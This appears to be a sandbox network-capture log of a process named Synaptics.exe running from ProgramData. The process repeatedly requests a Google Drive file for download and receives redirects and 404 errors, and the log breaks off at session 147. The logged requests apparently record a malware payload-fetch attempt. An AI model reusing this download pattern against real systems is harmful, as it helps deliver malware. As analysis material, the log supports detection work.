                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        138 | 192.168.2.7 | 50183 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:49 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6ge6UBvu9uZiZtdxmI0-pNOO5HjFXlfEMJrSSmSIflKgJBAcqVwocIJKE61nno-c_UUtT2Ygg
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dBZO0BNDW_1v7pqPQxbUGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:49 UTC | 140 | IN
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:49 UTC | 1390 | IN
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="5rXaxq-VGopdfsfqRP0Zfw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:49 UTC | 122 | IN
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        139 | 192.168.2.7 | 50184 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:49 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xbn4x94tIGzxe98loOVUyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        140 | 192.168.2.7 | 50185 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:49 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6lTGIW5_v_Ad-GPfsTluD8HOmb7ZQvVwDDb_wkXivZ3IlM6PwMNeX0L9IwVtXWPzFH
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jH3QNddspFNMkjNbVxAx7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:49 UTC | 147 | IN
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:49 UTC | 1390 | IN
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="-ql-jTEMSq8fIMoaRuIPAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:49 UTC | 115 | IN
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        141 | 192.168.2.7 | 50186 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:49 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:49 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:49 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-_KuP9IWtt1ATmvxUQkIrcQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.7 | 50187 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:50 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-iYDP50rim0Lxcc6Sl97yCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.7 | 50188 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:50 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:50 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7RsI4IkVDAWhw9X3YB-4sRiYsdjXMJMC-WUbQI93dliba3ysV-qYaK5pyfAwJls7fR
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DGA-k_GhwQlVtb6IjSbW0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:50 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:50 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="AF5OyVj-3CI_myMz7kxk9g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:50 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.7 | 50189 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:50 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jqSmsyjBitq3sNfzhdNdfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.7 | 50190 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:50 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:50 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6aX6ttD9KgBWR3kvDukDEJUG10DMgvxXnC7F9wdoo3yacrFa7RNiFqZ1Tvj2CzdeUK
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:50 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4OTMKfTK9Z79lD8xm8TWlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:50 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:50 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="cnMGFqU-Qip5Z4iv1EUwJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:50 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.7 | 50192 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:51 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:51 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:51 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-31XKlfK54AQSN5OWb0AnJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.7 | 50193 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
